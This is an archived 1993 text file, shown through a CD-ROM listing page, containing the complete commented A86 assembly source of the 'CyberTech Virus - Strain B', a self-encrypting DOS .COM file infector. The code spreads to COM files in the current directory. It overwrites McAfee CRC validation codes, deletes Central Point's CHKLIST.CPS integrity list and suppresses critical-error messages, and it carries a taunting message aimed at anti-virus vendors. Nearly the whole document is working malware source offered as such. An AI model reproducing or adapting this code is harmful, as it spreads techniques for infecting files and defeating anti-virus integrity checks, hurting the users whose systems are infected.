HaCKeRz Kr0nlcKLeZ 1

home *** CD-ROM | disk | FTP | other *** search

/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / tdupdat2.err / TARDBENT.ZIP / JOHNTARD.ZIP / CYBTCHB2.ZIP / CYBTCHB2.A86 next >

Wrap

Text File | 1993-12-24 | 21.6 KB | 501 lines

; ; CyberTech Virus - Strain B John Tardy (C) 1993 ; ; Written in A86 V3.22 ; ; Description : This is a Non-Resident Self-Encrypting .COM file infector ; which infects COM files in the current directory. It will ; remove CHKLIST.CPS from the current directory after it has ; infected a program. CHKLIST.CPS is a file which is used by ; VDEFEND of PCSHELL and Central Point AntiVirus. When a ; validation code is added by SCAN of McAfee, it will overwrite ; the code, so the file is no longer CRC protected anymore. ; After 1993, the virus activates. It then displays a message ; that your system has been infected. The virus will remove ; itself from the infected file and completely restore it. If ; a validation code was added, it is lost, but the file is not ; corrupted and will function normally. Even when the file is ; compressed afterwards by an executable file compressor, it is ; uncompressed. Before 1994, the virus sometimes display it's ; copyright. This is caused when the random encryption counter ; is a 0. It will redefine it, so there is no visible text in ; the virus. It checks also if there is enough diskspace ; aveable and installs a critical error handler. ; Org 0h ; Generate .BIN file Start: Jmp MainVir ; Jump to decryptor code at EOF Db '*' ; Virus signature (very short) ; ; Decryptor procedure ; MainVir: Call On1 ; Push offset on stack On1: Pop BP ; Calculate virus offset Sub BP,Offset MainVir+3 ; Push Ax ; Save possible error code Lea Di,Crypt[BP] ; Decrypt the virus with a Mov Si,Di ; very simple exclusive or Mov Cx,CryptLen ; function. Decrypt: Lodsb ; Xor Al,0 ; Stosb ; Loop Decrypt ; DecrLen Equ $-MainVir ; Length of the decryptor ; ; Main initialization procedure ; Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) Mov Cs:Start+100h,Ax ; Mov Cs:Start[2]+100h,Bx ; Xor Ax,Ax ; Get original interrupt 24 Push Ax ; (critical error handler) Pop Ds ; Mov Bx,Ds:[4*24h] ; Mov Es,Ds:[4*24h]+4 ; Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place Mov Word Ptr Cs:OldInt24+2[Bp],Es ; Lea Bx,NewInt24[Bp] ; Install own critical error Push Cs ; handler to avoid messages Pop Es ; when a disk is write Mov Word Ptr Ds:[4*24h],Bx ; protected and such things Mov Word Ptr Ds:[4*24h]+2,Es ; Push Cs ; Pop Ds ; Mov Ah,30h ; Check if DOS version is Int 21h ; 3.0 or above for correct Cmp Al,3 ; interrupt use Jae TestDate ; Jmp Ready ; TestDate: Mov Ah,2ah ; Check if 1993 is past time Int 21h ; already Cmp Cx,1994 ; Jae Clean ; - 1994 or more Jmp NoClean ; - Not 1994 or more ; ; Main Cleanup procedure ; Clean: Mov Ah,1ah ; Move DTA to a safe place Mov Dx,0fd00h ; Int 21h ; Mov Ax,Cs:[2ch] ; Find the name of the Mov Ds,Ax ; program that is now Mov Si,0 ; executed (me must search in Mov Cx,4000h ; the DOS environment for Seeker: Lodsb ; safe tracking of the name Cmp Al,1 ; Je On3 ; Loop Seeker ; On3: Inc Si ; Transfer the found name Push Cs ; to a safe address in memory Pop Es ; Mov Di,0fd80h ; Mov Cx,80h ; Trans: Lodsb ; Cmp Al,0 ; Je Verder ; Stosb ; Loop Trans ; Verder: Stosb Sub Di,12 Push Cs Pop Ds Mov Ax,[Di][0] ; Cmp Ax,'OC' Jne Normal Mov Ax,[Di][2] Cmp Ax,'MM' Jne Normal Mov Ax,[Di][4] Cmp Ax,'NA' Jne Normal Jmp Ready Normal: Push Cs ; Read file attributes and Pop Ds ; check if an error has Mov Ax,4300h ; occured Mov Dx,0fd80h ; Int 21h ; Jnc DeInfect ; - No error, DeInfect Jmp Ready ; - Error, Ready DeInfect: Push Cx ; Store old file attributes Mov Ax,4301h ; Clear file attributes Xor Cx,Cx ; (for read only etc.) Int 21h ; Mov Ax,3d02h ; Open the file Int 21h ; Mov Bx,Ax ; Read file date/time stamp Mov Ax,5700h ; and store it on the stack Int 21h ; for later use Push Cx ; Push Dx ; Mov Ah,3eh ; Close file Int 21h ; Mov Dx,0fd80h ; Create a new file with the Xor Cx,Cx ; same name Mov Ah,3ch ; Int 21h ; Mov Bx,Ax ; store file handle in BX Mov Dx,100h ; program to file (the original Mov Cx,Bp ; file is now back again) Sub Cx,0fch ; Mov Ah,40h ; write memory image of host Int 21h ; Pop Dx ; restore file date/time Pop Cx ; stamp Mov Ax,5701h ; Int 21h ; Mov Ah,3eh ; close file Int 21h ; Pop Cx ; restore file attributes Mov Ax,4301h ; Mov Dx,0fd80h ; Int 21h ; Push Cs ; Show message that the Pop Ds ; system has been infected Mov Ah,9 ; and shutdown virus Lea Dx,Removed[Bp] ; Int 21h ; Jmp Ready ; ; ; Main viral part ; NoClean: Mov Ah,1ah ; Store DTA at safe place Mov Dx,0fd00h ; Int 21h ; Mov Ah,4eh ; FindFirsFile Function Search: Lea Dx,FileSpec[BP] ; Search for filespec given Xor Cx,Cx ; in FileSpec adress Int 21h ; Jnc Found ; Found - Found Jmp Ready ; Not Found - Ready Found: Mov Ax,4300h ; Get file attributes and Mov Dx,0fd1eh ; store them on the stack Int 21h ; Push Cx ; Mov Ax,4301h ; clear file attributes Xor Cx,Cx ; Int 21h ; Mov Ax,3d02h ; open file with read/write Int 21h ; access Mov Bx,5700h ; save file date/time stamp Xchg Ax,Bx ; on the stack Int 21h ; Push Cx ; Push Dx ; Mov Ah,3fh ; read the first 4 bytes of Lea Dx,OrgPrg[BP] ; the program onto OrgPrg Mov Cx,4 ; Int 21h ; Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file Cmp Ax,'ZM' ; Je ExeFile ; Cmp Ax,'MZ' ; Check if renamed weird exe- Je ExeFile ; file Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected Cmp Ah,'*' ; Jne Infect ; ExeFile: Call Close ; If one of the checks is yes, Mov Ah,4fh ; close file and search next Jmp Search ; file FSeek: Xor Cx,Cx ; subroutine to jump to end Xor Dx,Dx ; or begin of file Int 21h ; Ret ; Infect: Mov Ax,0fd1e[0] ; check if the file is Cmp Ax,'OC' ; COMMAN?.COM (usually result Jne NoCommand ; if COMMAND.COM) Mov Ax,0fd1e[2] ; Cmp Ax,'MM' ; Jne NoCommand ; Mov Ax,0fd1e[4] ; Cmp Ax,'NA' ; Jne NoCommand ; Mov Ax,4202h ; Jump to EOF Call Fseek ; Cmp Ax,0f000h ; Check if file too large Jae ExeFile Cmp Ax,VirS ; Check if file to short jbe ExeFile Sub Ax,VirS Xchg Cx,Dx Mov Dx,4200h Xchg Dx,Ax Mov EOFminVir[BP],Dx Int 21h Mov Ah,3fh Mov Dx,Offset Buffer Mov Cx,VirS Int 21h Cld Mov Si,Offset Buffer Mov Cx,VirLen On5: Push Cx On6: Lodsb Cmp Al,0 Jne On4 Loop On6 On4: Cmp Cx,0 Je Found0 Pop Cx Cmp Si,SeekLen Jb On5 Jmp NoCommand Found0: Pop Cx Sub Si,Offset Buffer Sub Si,Cx Xor Cx,Cx Mov Dx,EOFminVir[BP] Add Dx,Si Mov Ax,4200h Int 21h Jmp CalcVirus EOFminVir Dw 0 NoCommand: Mov Ax,4202h ; jump to EOF Call FSeek ; Cmp Ax,0f000h ; Check if file too large Jb NoExe1 ; if yes, goto exefile Jmp ExeFile ; NoExe1: Cmp Ax,10 ; Check if file too short Ja NoExe2 ; if yes, goto exefile Jmp ExeFile ; NoExe2: Mov Cx,Dx ; calculate pointer to offset Mov Dx,Ax ; EOF-52 (for McAfee validation Sub Dx,52 ; codes) Mov Si,Cx ; move file pointer to the Mov Di,Dx ; calculated address Mov Ax,4200h ; Int 21h ; Mov Ah,3fh ; read the last 52 bytes Mov Dx,0fb00h ; of the file Mov Cx,52 ; Int 21h ; Cmp Ds:0Fb00h,0fdf0h ; check if protected with the Jne Check2 ; AG option Cmp Ds:0fb02h,0aac5h ; Jne Check2 ; Mov Ax,4200h ; yes - let virus overwrite Mov Cx,Si ; the code with itself, so Mov Dx,Di ; the file has no validation Int 21h ; code Jmp CalcVirus ; Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the Jne Eof ; AV option Cmp Ds:0Fb02h+42,0aac5h ; Jne Eof ; Mov Ax,4200h ; yes - let virus overwrite Mov Cx,Si ; the code with itself, so Mov Dx,Di ; the file has no validation Add Dx,42 ; code Int 21h ; Jmp CalcVirus ; Eof: Mov Ax,4202h ; not AG or AV - jump to Call Fseek ; EOF CalcVirus: Sub Ax,3 ; calculate the jump for the Mov Cs:CallPtr[BP]+1,Ax ; virus start GetCrypt: Mov Ah,2ch ; get 100s seconds for the Int 21h ; encryption value. Cmp Dl,0 ; if not zero, goto NoZero Jne NoZero ; Mov Ah,9 ; If zero, display copyright Lea Dx,Msg[Bp] ; message and generate again Int 21h ; a number Jmp GetCrypt ; NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor Lea Si,MainVir[BP] ; Move changed decryptor to Mov Di,0fb00h ; a safe place in memory Mov Cx,DecrLen ; Rep Movsb ; Lea Si,Crypt[BP] ; Encrypt the virus and merge Mov Cx,CryptLen ; it to the changed decryptor Encrypt: Lodsb ; code Xor Al,Dl ; Stosb ; Loop Encrypt ; Mov Ah,40h ; append virus at EOF or over Lea Dx,0fb00h ; the validation code of Mov Cx,VirLen ; McAfee Int 21h ; Mov Ax,4200h ; Jump to BOF Call FSeek ; Mov Ah,40h ; Write Jump at BOF Lea Dx,CallPtr[BP] ; Mov Cx,4 ; Int 21h ; Call Close ; Jump to Close routine Ready: Mov Ah,1ah ; Restore DTA to normal Mov Dx,80h ; offset Int 21h ; Mov Ax,Cs:OldInt24[Bp] ; remove critical error Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the Xor Bx,Bx ; original handler at the Push Bx ; interrupt table Pop Ds ; Mov Ds:[4*24h],Dx ; Mov Ds:[4*24h]+2,Ax ; Push Cs ; Pop Ds ; Pop Ax ; restore possible error code Mov Bx,100h ; nice way to jump to the Push Cs ; begin of the original host Push Bx ; code Retf ; Close: Pop Si ; why??? Pop Dx ; restore file date/time Pop Cx ; stamp Mov Ax,5701h ; Int 21h ; Mov Ah,3eh ; close file Int 21h ; Mov Ax,4301h ; restore file attributes Pop Cx ; Mov Dx,0fd1eh ; Int 21h ; Mov Ah,41h ; delete CHKLIST.CPS (the Lea Dx,CpsName[BP] ; Central Point CRC list) Int 21h ; Push Si ; why??? Ret ; ; Message when we are in 1994 ; ;Removed Db 13,10,'Virus removed : ',13,10 Removed Db 13,10,'Previous year you was infected by me, but now I am' Db 13,10,'gone. Message to McAfee : do not group viruses, it is' Db 13,10,'confusing, better use CARO standards for every virus.' Db 13,10,'Also improve your scanner, so that I cannot simply switch' Db 13,10,'2 lines of code in my decryptor and it is hidden again.' Db 13,10,'Can virus scan strains be copyrighted, so that every' Db 13,10,'scanner needs a seperate strain?',13,10 ; ; Message when encryption byte = 0 or when we are living in 1994 ; Msg Db 13,10,'CyberTech Virus - Strain B-2' Db 13,10,'(C) 1993 John Tardy of Trident' Db 13,10,'$' ; ; New critical error handler ; NewInt24: Mov Al,3 ; supress any critical error Iret ; messages CpsName Db 'chklist.cps',0 ; name for CP CRC-list OldInt24 Dd 0 ; storage place for old int 24 CallPtr Db 0e9h,0,0 ; jump to place at BOF FileSpec Db '*.COM',0 ; filespec and infection marker OrgPrg: Int 20h ; original program Db 'JT' ; CryptLen Equ $-Crypt ; encrypted part length VirLen Equ $-MainVir ; total virus length Buffer Equ 0f040h ; buffer offset VirS Equ VirLen*2 SeekLen Equ Buffer+Virs ; ───────────────────────────────────────────────────────────────────────── ; ───────────────> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <─────────────── ; ───────────> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <─────────── ; ─────────────────────────────────────────────────────────────────────────